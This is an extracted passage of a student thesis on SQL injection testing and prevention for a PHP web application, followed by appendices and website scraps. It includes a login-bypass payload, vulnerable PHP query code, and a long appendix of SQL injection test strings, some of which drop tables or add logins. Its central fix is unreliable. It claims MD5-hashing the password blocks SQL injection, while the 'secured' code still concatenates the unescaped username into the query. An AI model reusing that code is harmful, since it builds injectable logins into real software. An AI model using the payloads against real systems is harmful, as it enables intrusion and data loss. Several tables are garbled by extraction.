and stored procedures manually can prevent SQL injection. These method is introduces in
OWSAP’s. SQL code structure need to well defined before inserting parameters in the query.
Parameters are used to define SQL structure. Developers should need to define all the
parameter by understanding all input sources. After parameterized query, developer must
appropriately validate the input data type. The programmers essentially define the input data
type whether it is numeric or string or any other data type and if input data enter by user is
not correct then it could simply be reject. White list filtering is also used in validation
developers also need to block some special characters so white list special characters can only
be accessible. The filtering method is appropriate for the well-structured data i.e. email
address, birthdates, etc.
Figure 33 Defensive Coding
67
PRT505
Thesis
7.2.1 SQL dom:
SQL dom technique provides a safe way to elude the SQL injection problem. It uses the
encapsulation technique for database queries and also changing the query building process. In
the process a set of classes that enables automated data validation. It motivating developers to
provide their own database schema and build SQL statement using its API’s. Runtime
prevention Randomization Learning based prevention is the other methods for SQL injection
prevention method (Kumar and Indu, 2015).
7.2.2 Amnesia:
The amnesia is acronym for analysis for monitoring and neutralizing SQL injection attack. It
is static analysis. It helps in detection illegal query before execution in database. In this
technique developer create a model of genuine queries that could be generated by the web
application. It has also a dynamic part in which it uses dynamic runtime (Kumar and Indu,
2015).
7.2.3 Input validation
User credentials needs to be validated before they used by web applications. Usually, web
developers applied validations protocols to transform user credentials into trusted data by
filtering characters. Developers can apply several types of rules for runtime interpretation.
For example, a PHP file may comprise both static PHP statements and HTML tag. A HTML
page embedded to execute JavaScript code. The application data and code can be
representation via an unstructured sequence of bytes is a distinct feature of web application.
Since developers have expect the contexts where and how user credentials are used that pose
different validations requirements (i.e., case-sensitive validation). For example, applying the
default HTML evasion validation is recommended for authenticates the values inside HTML
tags (LI and XUE, 2015).
7.2.4 Session management:
Web applications have a concept of a web session to provide security. This concept is used to
recognize and relate a series of web requests from the same user during a certain period of
time. Session variables (or session data) are connected with a web session, and can be used
by the web application to record the logs from the historical web requests that
Affect the future execution of the web application (i.e., application session state).
The session variables are maintained at the client side by a cookie and at the server side by
database. In the server side, a distinct identifier called as session ID, is defined to index the
session variables saved at the server side and for the future purpose of client. To manage the
68
PRT505
Thesis
web session frame works and web programming languages (e.g., PHP and JSP) provides
developers a collection of functions. For example, in PHP, session start() can be used to set a
web session and a pre-defined global array $SESSION can be used to store the session
variables (LI and XUE, 2015).
7.3 Prevention of injection in MySQL by using URL method attack
In this type of attack, attacker can log on to an application, with administrative powers,
without a valid username and password. Authentication bypass vulnerabilities can have so
many different causes that it is not possible to give a wide-ranging list of methods to prevent.
But the following steps you can take include:

The penetration testing framework helps in to check for known vulnerabilities
regarding authentication in IT infrastructure.

In authentication code development, it needs to be active monitoring in SQL injection
vulnerabilities or buffer overflow errors.

Be aware of the sorts of vulnerabilities outlined in this article.

As ever, ensure that your applications are patched and up to date, and your network
hardware is running the latest firmware.
7.4 Analysis of web application code
To criticize code quality, most development and testing teams implies on static code analysis
with activities of common software verification. Static code analysis use formal approaches
and methods with abstract interpretation to verify various programming languages (Burnett &
Books24x7, 2004). This approach allows development teams to:

Analyse Degree of code complexity and verify passivity with standards of coding.
This method certifies that the software will not be crash due to specified type of runtime errors.

It performs the impact to determine how code may affect the functionality or
reliability of application or other pages.
Except that these following methods can be utilized to criticise the written code:
7.4.1 By Static code Analysis with polyspace code verifiers
Static code analysis begins with the review processes which are manual in nature and timeconsuming. It is quite different as the dynamic testing. Dynamic testing requires primarily
the application to be executed (Burnett & Books24x7, 2004). Static code analysis is
accomplished on the source code of a program. It includes quality checks in starting before
the application code is integrated and ready for test. During analysis, some tools are used to
69
PRT505
Thesis
measure the complexity metrics and compliance of development standard, known as
polyspace tools.
Polyspace tools uses general methods that actively analysis the code deeply. Polyspace tools
verify the code quality is it bad or worth it or better on the basis their test results. It also
verifies the code is free from run time errors. Results of static analysis are important for the
software which requires safety certifications (Burnett & Books24x7, 2004).
Some tools are less advanced that performs elementary tests like generates wrong outcomes
in a positive or negative way.
7.4.2 Measuring code complexity and checking with coding standards
Cyclomatic complexity of code metrics gives an important outlook when criticizing the
quality of code. It is required for software because they are developing with a high-integrity.
It quantifies of all linearly independent paths, the metrics helps in the understanding the
complexity of code (Burnett & Books24x7, 2004). More the complex code, as down the
quality of code. By setting verges on code complexities, developer teams can analyse the
difficulty of the code.
Coding standards generally address problems to measure the quality of code because of the
wide latitude of languages used for software development. Some Languages like C and C++
supports complex coding for better outcome, whether language like PHP, Perl supports easy
approach for coding (Burnett & Books24x7, 2004).
Coding standards are established to improve software quality by eliminating worst quality
complex code. Polyspace code tools and verifiers compliance with code standards to analyse
quality code. The Polyspace code generates complexity and code quality reports helps in
understanding the code.
7.4.3 Proving the presence of errors
Abstract interpretation is simple method uses mathematics prove to analyse source code. It
includes arithmetic overflow, out-of-bounds array access and divide by zero. Abstract
interoperation points out the classes that could be run with the other methods. This will help
in reducing the size of code as well as proving the presence of errors. Abstraction
interpretation assigns each element that it founds can be modified with four ways.
Grey- can’t be modified
Red- can be improvised
Green- great code
Orange- it shows coding standard violate
70
PRT505
Thesis
These Color-coding assists to find out the status of specific options of the source code.
7.4.4 Performing impact analysis
This analysis deal the thing that how the written code could be change without affects the
functionality of code in another area. It is important to ensure that quality of code not affect
the functionality of system.
For example, Assume that a development team has recognised the code elements that are
optimized for a real-time embedded system and also those elements that could be optimize in
terms of quality. The developers need to analyse the impact for quality improvement and
dead code (In.mathworks.com, 2015).
7.5 URL method for prevention of SQL injection
URL method is filter approach. It is used to address the problem of SQL. It is a program that
runs on the server before the servlet or JSP page. A filter can be involved in one or more JSP
pages or servlets. A filter examines the request and information going with these assets.

Authentication- user identity will results the Blocking or authentication.

Logging and auditing- it will tracks web application users.

Image conversion-it converts the images and Scale maps.

Data compression-Making downloads faster.

Localization- in this request is targeting and response to an individual.

XSL/T transformations of XML content- these targeting responses of web application
more than one type of client system.
These are the applications filters. There are many application filters, such as encryption,
triggering resource access events, tokenizing, mime-type chaining, and caching. Single filter
can be used for many webpages; it is the biggest advantages of using filter. It enhances the
scalability and reusability (Burnett & Books24x7, 2004).
Designing of filter provide security against the SQL Injection. A hacker attacks with the help
of URL alteration. This URL is not validated thus this URL request straight goes to the
database server. The database server will act according that, so the little change in the URL
by a hacker can take ruin all over the application. By engaging a filter between the request
and the database server and can secure the web application, and by the reusability
feature of the servlets, there is need to be design a single filter for all pages.
71
PRT505
Thesis
Figure 34 Single Filter for Different Pages
Figure 34 describes that if there is any request arrives for the any page in the web application
server then it will first redirect to the filter. Filter analyse the request. if it is a valid request
then it redirect the request to desired page else it divert the request to the error page, so URL
modification will not be considered as the genuine request and it will greet with the error
page (roy, singh and sairam, 2012).
Figure 35 Web Application Filter Architecture
72
PRT505
Thesis
The above Figure 35 is explain about after adding filers in to user input and after adding
MD5 hashing algorithm so sanitise user input to secure form SQl injection attack. I tested
same BCS application and pass the same SQL queries which manipulate the whole database
after implementing in to the URL. I found below results after passing each query.
7.6 SQL injection by using Bypass authentication method
I filled out the login form with the value Login: ' OR ''=‘, Password: ' OR ''=‘. Before when I
click on the sign in button it’s allow me to go directly in to the web page because the query
will compare nothing and its pass. But, after adding MD5 algorithm in to the web code. It
will not allow user to bypass this query. As you can see in to the below snap shot, I passed
same values which I passed when the web application was vulnerable from SQL Bypass
authentication method.
Figure 36 Buy Cut save Application Login Page
The given Figure 36 proved that, after clicking on Sign in button, now web page in going in
to the error page. It won’t allow user to bypass the login authentication by comparing values
in to the sql query. Because I implemented MD5 message digest algorithm which used to
cryptographic hash function. How we used MD5 Algorithm in to our tested web application
code:
We used below function line of code in our application to implement MD5 algorithm in to the
web application.
$password = md5($_POST["inputPassword"]);
73
PRT505
Thesis
When users pass the input from login page, the query passed in to the back end to check
whether that user information is authenticated or not. So, when we use MD5 algorithm, in
select query it is convert “123456” value into “e10adc3949ba59abbe56e057f20f883e”. So
when attackers fire any sql injection it will encrypt password value into md5 value. If
attackers try to bypass the null values in to the login page, it will send the attackers to the
error page as we found in Figure 37. Below are the changes I did in to the code to use this
MD5 algorithm to secure Bypass authentication SQL attack.
 Before without using of MD5 algorithm
$password = $_POST["inputPassword"];
We can perform sql injection. It will pass value
SELECT * FROM admin WHEREwhereadmin_name ='$admin_name' and password= or
1=1
So it will easily break condition of query using OR operator.
$info = mysql_query ("select * from admin where admin_name ='$admin_name' and
password='$password'");
 After using MD5 algorithm:
$admin_name = $_POST ["input Email"];
$password = md5 ($_POST ["input Password"]);
$info
=
mysql_query
("select
*
from
admin
where
admin_name
='$admin_name' and password='$password'");
If (mysql_num_rows ($info)>0)
{
$a = mysql_fetch_array ($info);
$_SESSION["Admin"] = $a["admin_name"];
$_SESSION["AdminId"] = $a["admin_id"];
$_SESSION['start'] = time(); // taking now logged in time
$_SESSION['expire'] = $_SESSION['start'] + (480 * 60) ;
header("Location:orders.php");
exit();
}
else
74
PRT505
Thesis
Figure 37 Buy Cut save Application Login Page
Secure SQL injection by using URL method and Blind Sql Injection:
Below is the security matrix for the BCS web application which representing the
vulnerabilities in to the particular web page.
SQL Attacks
Admin Portal Pages
Login Home Order
Page
Product
Newsletter
Management Management
Management management
page
Page
Page
Page
FAIL
FAIL
FAIL
FAIL
FAIL
FAIL
FAIL
PASS
PASS
FAIL
SQL FAIL
FAIL
FAIL
PASS
PASS
FAIL
based FAIL
FAIL
FAIL
PASS
PASS
FAIL
Authentication PASS
Page
Category
bypass
In my SQL FAIL
using
URL
method
Blind
Injection
Error
SQL Injection
75
PRT505
Thesis
After analysing the security matrix, I found that in the BCS web application we got
category_form, newsletter_form, and product_form files are vulnerable for all sql injection
methods.
The web pages which are vulnerable from SQL injection methods which we tested previously
and dump the whole database by passing the strong SQL queries in to the URL.
Solution for SQL injection attacks for BCS web application:
Before this web application was not sanitising and validating any user input. When attackers
pass any malicious code in to the URL or in to the input tags, the query accepting that all
values and adding in to the database.
Solution for this attack is we have to sanitise the user input and make sure database only
accept input values which is acceptable.
For securing these vulnerable pages I implemented INTVAL function in PHP coding. Which
only accept integer values in to the URL. So if attacker passes any malicious code or any
character values in to the query, function will convert all values in to the integer and it will
not allow him to fetch the any back-end information. Below is the web pages code which in I
implemented the INTVAL function.
The web pages I secured from SQL injection which are given below.
Figure 38 Buy Cut Save Application Category Form page
The given page in Figure 38 is the web page from BCS web application which we tested with
SQL injection attack. This page was showing the error when we pass any quotes or malicious
76
PRT505
Thesis
code as we already tested previously. This page was vulnerable before I implemented the
functions to filter the user input. Now, if attackers pass any quote to check whether this page
is vulnerable for SQL injection or not. The page load normally. We can see in below snap
shot. I tried to pass quote after implementing user input filters in to this below link.
Figure 39 Buy Cut saves Application Category Form Page
The quote turns in to the %27 and page load normally as we can see in Figure 39. That means
the page is not allowing user to get any error or any information after passing malicious codes
in to the URL that indicate this page vulnerable. So, now this web page is secure when
attackers pass any script or malicious codes in to the URL for hacking the whole back end.
I passed the all queries and malicious codes which we used before to hack BCS web
application. After implementing user filters in to the code it won’t allow attackers to pass any
scrip or any inject-able query to hack that web application. Below is the table which is
representing the result of each query I tested after implementing user input filters.
77
PRT505
Web
Thesis
site:
BCS
web
application
Page
Name:
Category
Management
File Name: Category Form
In MSQL by using URL Result
method Attack
before
implementing Result
after
input filters
input filters
URL
PASS
FAIL
Enumerating column length
PASS
FAIL
Finding NULL column
PASS
FAIL
PASS
FAIL
PASS
FAIL
PASS
FAIL
implementing
Passing the Quotes in to the
Finding
version
of
the
database
Fetching User name from
database
Fetching column name from
database
PASS:
NOTE:
The
web
page
is
vulnerable
FAIL: The web page is not
vulnerable
7.7 Secure the Blind SQL Injection:
As we hacked the BCS web application by using Blind SQL injection technique. We passed
malicious queries we made to hack that application and we dump the whole database. Now,
after implementing filters to prevent from user input attacks I tested again with the same
queries with the same web pages. Below is the testing result for Blind SQL injection attack
after implementing user input filters.
However, if you pass any false condition after the URL and load the page when the web page
is vulnerable from blind SQL injection. It replies with missing some text, picture or some
78
PRT505
Thesis
content in to the web page as we tested. We can see in Figure 40, when I tested the blind SQL
injection attack after implementing user input filters.
I passed false condition 1=2 in to the URL. But the page load normally that means this page
is not vulnerable from Blind SQL injection attack. We can see in below snap shot.
Figure 40 Buy Cut save Application Category Form Page
Moreover, I tested the all pages of BCS web application which was vulnerable before
implementing user input filters. Below is the table which is representing the result of testing
of Blind SQL injection attack after and before implementing user input filters in to the code.
Web site: BCS web application
Page
Name:
Category
Management
File Name: Category_Form
Result
Result
after
before implementing
input
Blind SQL Injection Attack
implementing input filters
filters
Vulnerability Checking
PASS
FAIL
PASS
FAIL
current database:
PASS
FAIL
Enumerating Column Name
PASS
FAIL
Getting
Version
In
MySQL
Database
enumerating table name from the
79
PRT505
Thesis
PASS: The web page is
NOTE:
vulnerable
FAIL: The web page is
not vulnerable
VIII. Conclusion
This report first describes unique characteristics of web application development, and then
illustrates three types of testing for vulnerabilities and attacks. We discussed how the security
testing methodologies work and at the end we apply those techniques to secure our BCS web
application from SQLI attack.
Web applications have been evolving extraordinarily fast with new programming models and
technologies. The most applied security testing methodologies today are extensive and are
sometimes too complicated with their many activities and phases. By applying such broad
security testing methodologies in the realm of Web applications, developers tend to neglect
the testing process because the methodologies are considered time-consuming, lacking a
significant payoff and inappropriate to be applied on Web applications because they have a
very short time-to-market.
This results in an ever-changing landscape for web application security with new challenges,
which requires substantial and sustained efforts from security researchers. Security attacks
are always emerging; it requires the security professional to provide positive security solution
to prevent the web applications from various web application attacks.
80
PRT505
Thesis
IX. Reference:
Antunes, N., Vieira, M.: detecting SQL Injection Vulnerabilities in WebServices. Dependable
Computing, Latin-American Symposium on 0 (2009)17_24
Antunes, N. & Vieira, M. 2014, "Penetration Testing for Web Services", Computer, vol. 47,
no. 2, pp. 30-36.
AtefehTajpour, Suhaimi Ibrahim & Mohammad Sharifi 2012, "Web Application Security by
SQL Injection DetectionTools", International Journal of Computer Science Issues (IJCSI),
vol. 9, no. 2, pp. 332-339.
Antunes, N., Laranjeiro, N., Vieira, M., Madeira, H.: E_ective Detection of SQL/XPath
Injection Vulnerabilities in Web Services. In: Proceedings of the 2009 IEEE International
Conference on Services Computing. SCC'09, Washington, DC, USA, IEEE Computer
Society (2009) 260_267.
Abdul Razzaq, Ali Hur, H Farooq Ahmad &Muddassar Masood 2012, "Semantic
Architecture for Web application Security", International Journal of Computer Science
Issues, vol. 9, no. 2, pp. 435-441.
Anonymous 2010, “Google steps up security of web applications”, COMTEX News
Network, Inc, Woodside
Asd.gov.au, (2015).Protecting Web Applications and Users: ASD Australian Signals
Directorate. [online] Available at:
http://www.asd.gov.au/publications/protect/protecting_web_apps.htm#frame [Accessed 17
May 2015].
Bau, J., Bursztein, E., Gupta, D., Mitchell, J.: State of the Art: Automated Black-Box Web
Application Vulnerability Testing. In: Proceedingsof the 2010 IEEE Symposium on Security
and Privacy. SP '10, Washington,DC, USA, IEEE Computer Society (2010) 332_34547
Barnett, R.C. & Barnett, J. 2012, “Web Application Defender's Cookbook: Battling Hackers
and Protecting Users”, John Wiley & Sons.
81
PRT505
Thesis
Ben Rothke 2003, Web Hacking: Attacks and Defense / Hacking Exposed Web Applications:
Web Application Security Secrets and Solutions, ASIS International, Arlington.
Bayles, A.W. & Books24x7, I. 2007, Penetration tester's open source toolkit, Syngress,
Burlington, MA.
Ben-Natan, R. 2005, Implementing Database Security and Auditing (5th Edition), Digital
Press, Burlington.
Burnett, M. & Books24x7, I. 2004, Hacking the Code: ASP. NET Web Application
Security, Syngress Publishing, Rockland, Mass.
Bavani, R. 2012, "Distributed Agile, Agile Testing, and Technical Debt", IEEE Software, vol.
29, no. 6, pp. 28-33
Chris Anley. Advanced SQL Injection in SQL Server Applications.An NGSSoftware.
Cross, M. & Books24x7, I. 2007, Web application vulnerabilities: detect, exploit, prevent,
Syngress Pub, Burlington, MA.
Cross, M., Books24x7, I. &ebrary, I. 2007, Developer's guide to web application security,
Syngress, Rockland, MA.
Curphey, M.,&Arawo, R. 2006, "Web application security assessment tools", IEEE Security
& Privacy Magazine, vol. 4, no. 4, pp. 32-41.
Dorrans, B. 2010,” Beginning ASP.NET Security”, Wrox.
Doupé, A., Cova, M., Vigna, G.: Why Johnny can't pentest: an analysis of black-box web
vulnerability scanners. In: Proceedings of the 7th internationalconference on Detection of
intrusions and malware, and vulnerabilityassessment. DIMVA'10, Berlin, Heidelberg,
Springer-Verlag (2010) 111_131
Dpc.sa.gov.au,(2015). Policies,Standards
and
Guidelines.
[online]
Available
at:
http://dpc.sa.gov.au/policies-standards-and-guidelines [Accessed 10 April 2015].
Dharam, R. & G. Shiva, S. 2014, "Runtime Monitoring Framework for SQL Injection
Attacks", International Journal of Engineering and Technology, vol. 6, no. 5, pp. 392-401.
82
PRT505
Thesis
Desme, L. and Johns, M. (n.d.).web application security. [online] Available at:
http://research.microsoft.com/enus/um/people/livshits/papers%5Ctr%5Cdagrep_s12401.pdf
[Accessed 14 May 2015].
DuPaul, N. (2015). SQL Injection Tutorial: Learn About Injection Attacks, Vulnerabilities
and How to Prevent SQL Injections. [online] Veracode. Available at:
http://www.veracode.com/security/sql-injection [Accessed 14 May 2015].
Ellen Messmer 2008, "Dealing with SQL injection attacks", Network World, [Online], vol.
25, no. 18, pp. 14.
Easttom, C. 2012, Computer security fundamentals, Pearson Certification, Indianapolis, Ind.
Erdogan, G. (2009). Security Testing of Web Based Applications. [online] Available at:
http://www.diva-portal.org/smash/get/diva2:348920/FULLTEXT01.pdf [Accessed 14 May
2015].
Fong, E., Gaucher, R., Okun, V., Black, P.E., Dalci, E.: Building a Test Suite for Web
Application Scanners. In: Proceedings of the Proceedingsof the 41st Annual Hawaii
International Conference on System Sciences.HICSS '08, Washington, DC, USA, IEEE
Computer Society (2008) 478.
Fonseca, J., Vieira, M., Madeira, H.: Testing and Comparing Web Vulnerability
Fahad Alanazi& Mohamed Sarrab 2011, "The History of Web Application Security Risks",
International Journal of Computer Science and Information Security, vol. 9, no. 6, pp. 40-47.
Gavin Bierman, Erik Meijer, and Wolfram Schulte.The Essence of Data Access inCo. In The
19th European Conference on Object-Oriented Programming (ECOOP),pages 287–311,
2005.
Ghani, I., Azham, Z. & Jeong, S.R. 2014, "Integrating Software Security into Agile-Scrum
method", KSII Transactions on Internet and Information Systems, vol. 8, no. 2, pp. 646
Howard, M., LeBlanc, D., Viega, J.: 24 Deadly Sins of Software Security:Programming
Flaws and How to Fix Them. 1 edn. McGraw-Hill, Inc., NewYork, NY, USA (2010)
83
PRT505
Thesis
Insight
Security
Research
(NISR)
publication,
2002.http://www.nextgenss.com/papers/advanced_sql_injection.pdf.Laskos,
Web
Application
Vulnerability
Scanning
A.:
Arachni-
Framework(2011)
https://github.com/Zapotek/arachni.
In.mathworks.com, (2015).Improving Software Quality with Static Code Analysis. [online]
Available at: http://in.mathworks.com/company/newsletters/articles/improving-softwarequality-with-static-code-analysis.html [Accessed 17 May 2015].
Kumar, M. and Indu, L. (2015). Detection and Prevention of SQL Injection attack. [online]
(09759646). Available at:
http://www.ijcsit.com/docs/Volume%205/vol5issue01/ijcsit2014050178.pdf [Accessed 14
May 2015].
LI, X. and XUE, Y. (2015).A Survey on Server-side Approaches to Securing Web
Applications. [online] Available at: https://www.truststc.org/pubs/910/Survey-Final.pdf
Mcallister, S., Kirda, E., Kruegel, C.: Leveraging User Interactions for In-Depth Testing of
Web Applications. In: Proceedings of the 11th internationalsymposium on Recent Advances
in Intrusion Detection. RAID '08,Berlin, Heidelberg, Springer-Verlag (2008) 191_210
Manuel Costa, Miguel Castro, Lidong Zhou, Lintao Zhang, and Marcus Peinado.Bouncer:
Securing Software by Blocking Bad Input. In Proceedings of the 21st ACMSymposium on
Operating Systems Principles 2007 (SOSP 2007), pages 117–130, 2007.
Mehta, D. (n.d.). Effective Software Security Management. [online] mumbai. Available at:
https://www.owasp.org/images/2/28/Effective_Software_Security_Management.pdf
Meier, J.D. & Meier, J.D. 2006, "Web application security engineering", IEEE Security &
Privacy Magazine, vol. 4, no. 4, pp. 16-24.
Michael Cross 2007, Web application vunerabilities: detect, exploit, prevent, Syngress Media
Incorporated, GB.
84
PRT505
Thesis
Meier, J.D. & Meier, J.D. 2006, "Web application security engineering", IEEE Security &
Privacy Magazine, vol. 4, no. 4, pp. 16-24.
McClure, R. &Krüger, I. 2005, "SQL DOM: compile time checking of dynamic SQL
statements", ACM, , pp. 88.
Morgan, D. 2006, Web application security – SQL injection attacks, Elsevier B.V,
Kidlington.
Nahari, H., Krutz, R.L. & Books24x7, I. 2011, Web Commerce Security : Design and
Development, Wiley, Hoboken
Oehlert, P.: Violating Assumptions with Fuzzing. IEEE Security andPrivacy 3 (2005) 58_62
Owasp.org,
(2015). OWASP.
[online]
Available
at:
https://www.owasp.org/index.php/Main_Page [Accessed 19 April 2015].
Palmer, S.: Web Application Vulnerabilities: Detect, Exploit, Prevent.Syngress Publishing
(2007)
P Naresh Kumar, N Soujanya, G Yugandhar& K Nageswara Rao 2011, "THE IMAGE
LEVEL TAINTING: A NEW APPROACH FOR PREVENTING SQL INJECTION ATTACKS",
International Journal of Engineering Science and Technology, vol. 3, no. 7, pp. 5622-5628.
Pinto, M. &Stuttard, D. 2008, “Web Application Hackers Handbook: Discovering and
Exploiting Security Flaws”, John Wiley & Sons
Ping-Chen, X. 2011, "SQL injection attack and guard technical research",Procedia
Engineering, vol. 15, pp. 4131-4135.
Ringgold Inc, Portland,Hacking web apps; detecting and preventing web application security
problems, 2012.
Ringgold Inc, Portland,SQL injection attacks and defense, 2d ed,2013.
Roy, S., Singh, A. and Sairam, A. (2012).Novel Approach to Prevent SQL Injection Attack
Using URL Filter. [online] Available at: http://ijimt.org/papers/284-E20062.pdf [Accessed 14
May 2015].
85
PRT505
Thesis
Sutton, M., Greene, A., Amini, P.: Fuzzing: Brute Force Vulnerability Discovery. AddisonWesley Professional (2007)
Shelly, D.A.: Using a Web Server Test Bed to Analyze the Limitations of Web Application
Vulnerability Scanners. Master's thesis, Virginia PolytechnicInstitute and State University,
Blacksburg, Virginia (July 2010).
S.Mirdula&D.Manivannan 2013, "Security Vulnerabilities in Web Application - An Attack
Perspective", International Journal of Engineering and Technology, vol. 5, no. 2, pp. 1806
1811.
Sandra Sarasan 2013, "Detection and Prevention of Web Application Security
Attacks",International Journal of Advanced Electrical and Electronics Engineering, vol. 2, no.
3, pp. 29-34.
SANS Institute, (2007).Software Engineering - Security as a Process in the SDLC. [online]
Available at: http://www.sans.org/reading-room/whitepapers/securecode/softwareengineering-security-process-sdlc-1846 [Accessed 17 May 2015].
Scanning Tools for SQL Injection and XSS Attacks.Paci_cRimInternational Symposium on
Dependable Computing, IEEE 0 (2007) 365-372.
Shar, L.K. & Tan, H.B.K. 2013, "Defeating SQL Injection", Computer, vol. 46, no. 3, pp. 6977.
Simpson, M.T., Backman, K. & Corley, J.E. 2012, Hands-On Ethical Hacking and Network
Defense, Course Technology / Cengage Learning.
Vieira, M., Antunes, N., Madeira, H.: Using Web Security Scanners to Detect Vulnerabilities
in Web Services. 2009 IEEEIFIP International Conference on Dependable Systems Networks
(2009) 566_571
Zhao, G., Zheng, W., Zhao, J., Chen, H.: An Heuristic Method for Web-Service Program
Security Testing. ChinaGrid, Annual Conference 0 (2009)139_144
86
PRT505
Thesis
X. Appendices
10.1
Appendix- A
Top 10 Attacks in web application discovered by Howard, Leblanc & Viega
TOP 10 Attacks
Description
Injection-Methods
These Flaws occur when un-trusted data is passed to trick
the interpreter as a query in order to execute a command or
a query which can help attacker in granting access to the
data without any proper authorization.
Broken-Authentication
Session- management
and Application functionalities fail to address the core areas
like authentication and session management wherein
allowing the attackers to break in and compromise the
session cookies, tokens, passwords or any keys to exploit
and steal the identities.
Cross -Site Scripting (XSS)
These are specially crafted scripts which are accepted by
the flawed applications and send the un-trusted data
through the web browser without a proper validation.
Cross site Scripting (XSS) helps attackers in executing
scripts in the victim's web browser which has capacity to
hijack victim’s sessions, websites defacements or url
directs the victims to malicious sites.
Insecure-Direct-Object-
These are the instances where the developers expose a
References
reference to an internal implementation object which can
be a file or a directory or might be able to even be a
database key. This happens if there is no proper access
controls or other ways of protection. These flaws allow
attackers
to
manipulate
references
in
accessing
unauthorized data.
Security-Misconfiguration
Security can only be achieved with proper security
practises
which
include
defining
and
deploying
applications with robust security configurations similarly
for frameworks, servers on which the applications are
going to be installed and associated web servers and
87
PRT505
Thesis
database servers. As default setting stand to be insecure a
proper security settings are to be defined, implemented
and to be maintained. Above all updated.
Sensitive-Data-Exposure
Most of the present day web-apps are handling
Corporate/Private/Personnel data which is considered to
be sensitive and might not have a proper security controls
enforced. This allows attackers to steal the data for identity
thefts, credit card frauds to name a few.
Missing Function Level Access Web applications undergo functionality tests right before
Control
making full-fledged functional User Interface; on the other
hand there is also a need to perform the access control
checks on the server while the functions are getting
accessed. If the requests re not thoroughly verified
attackers will have a chance to break in with forge requests
in order to access the functionality compromising the
authorization.
Cross-site
Request A CSRF attack forces an application logged victim to
Forgery(CSRF)
execute some unwanted actions like sending forged
“HTTP requests”, which includes victim’s session related
information
like
session
cookies
and
any
other
authentication information to vulnerable web application.
Attackers can force the victim’s web browsers to create
requests where these requests trick the vulnerable
application as legitimate requests from the end-user.
Using
of
components
existing Vulnerabilities
with Usage of external libraries or frameworks or any software
module in application development can enhance the
functionality and features but also enhances the chances of
getting vulnerable. When a vulnerable component gets
exploited, it can aid attackers with data theft or application
takeovers. If vulnerable components are used in building
an application will enable the application for wide range of
attacks with associated business impact.
88
PRT505
Malicious
Forwards
Thesis
Redirects
and Present day web applications are subjected to url redirects
while determining the destination web pages. With no
proper validations in place Attackers are redirecting the
users to for their phishing sites or using web page
forwarding for unauthorised access of authorized pages.
89
PRT505
10.2
Thesis
Appendix- B
Testing for SQL Injection Weakness (Mirdula&Manivannan, 2013)
'
Single code
1' or '1'='1
1') or ('1'=1
Value' or '1'='2
Value') or ('1'='2
1' and '1'='2
1') and ('1'='2
1' or 'ab'='a'+'b
1') or ('ab'='a'+'b
1' or 'ab'='a''b
1') or ('ab'='a''b
1' or 'ab'='a'||'b
1') or ('ab'='a'||'b
';[SQL query];--
');[SQL query];--
';[SQL query];#
');[SQL query];#
;[SQL query];--
);[SQL query];--
;[SQL query];#
);[SQL query];#
1+1
3-1
Value+0
1 or 1=1
1) or (1=1
Value or 1=2
Value) or (1=2
1 and 1=2
1) and (1=2
1 or 'ab'='a'+'b'
1) or ('ab'='a'+'b'
1 or 'ab'='a''b'
1) or ('ab'='a''b'
1 or 'ab'='a'||'b'
1) or ('ab'='a'||'b'
Admin'--
Admin')--
Admin'#
Admin')#
1--
1)--
1 or 1=1--
1) or 1=1--
' or '1'='1'--
')or '1'='1'--
-1 and 1=2--
-1) and 1=2--
' and '1'='2'--
') and '1'='2--
1/*...*/
||6
or 1=1--
'||'6
" or "a"="a
(||6)
Admin' OR '
90
PRT505
Thesis
' OR 1=1--
' having 1 = 1--
OR 1=1
' OR 'text' = N'text'
' OR '1'='1
' OR 2 > 1
; OR '1'='1'
' OR 'text' > 't'
%27+--+
' union select
" or 1=1--
Password: */=1--
' or 1=1 /*
' or 1/*
'/**/OR/**/1/**/=/** /1
UNI/**/ON SELECT
' or 1 in (select @@version)--
';EXEC ('SEL' + 'ECT US' +'ER')
' union all select @@version
+or+isnull%281%2F0%29+%2F*
' OR 'unusual' = 'unusual'
' and 1 in (select var from temp)--
' OR 'something' = 'some'+'thing'
'; drop table temp--
' OR 'something' like 'some%'
Exec sp_addlogin 'name','password'
' OR 'whatever' in ('whatever')
@var select @var as var into temp end--
91
PRT505
10.3
Thesis
Appendix- C
Error messages for SQL injection by Mirdula&Manivannan 2013
MySQL error
"You
have
error
in
Access Error
an "Microsoft
Oracle Error
MSSQL Error
JET "Microsoft OLE DB Provider "Microsoft
your Database"
for SQL Server"
SQL"
DB
OLE
Provider
for
SQL Server"
"Division by zero "ODBC Microsoft "Microsoft OLE DB Provider "Unclosed
in"
Access Driver"
for Oracle"
quotation mark"
"Supplied
-
"[Macromedia][SQLServer
"[Microsoft][ODBC
argument is not a
JDBC
SQL
valid
MySQL
Driver][SQLServer]Incorrect" Driver]"
result
resource
Server
in"
"Call
to
a -
"Incorrect syntax near"
-
member
function"
92
PRT505
10.4
Thesis
Appendix- D
Attacking factors and impacts of the SQL Injection attack by Razzaq, Hur, Farooq&
Masood in 2012
Threat-Agents
Attacking
Security- weaknesses
vectors
(Prevalence
Technical
Business Impacts
& Impacts
Detectability )
Applications
Easily
Common
Moderate
Severe
Application/Busin
exploitable
Every
data Hackers
ess Specific
send Injections
attacks
arise This Leads All data upon the
which is given specially crafted when a web application in losing the access
can
as
modified
input
is text that tricks passes a crafted data to the ownership
considered to be the
interpreter. interpreter. These flaws of
stolen,
be
the and can even be
untrusted,
Irrespective
are quite common most machine as corrupted.
This
including
source of data cited with legacy code these flaws ultimately
keeps
internal/external
the which can implementations.
clients
admins
or even come from hard
Internal sources
to
discover
It’s on
reputation
via successful
stake.
testing the functionality exploitation
but can easily identified has
with code examination. ability
With
present
the
to
day provide
available scanners it has admin
become easy to detect access
these injection flaws
to
the attacker.
93
at
PRT505
Thesis
94

Security Testing on Web Application Prepared by: Tausif Aghariya

Transcription

Similar documents

Deploying (Forward Engineering) Emovies to SQL Server 2005 The

Calpine Northwest Geysers Enhanced Geothermal

MAXxess eAXxess Data Sheet

essential skills for sql server dbas

principles of injection coding

Brochure - Syncsystems

industrial revolution dbq

Presentation - Muzzicycles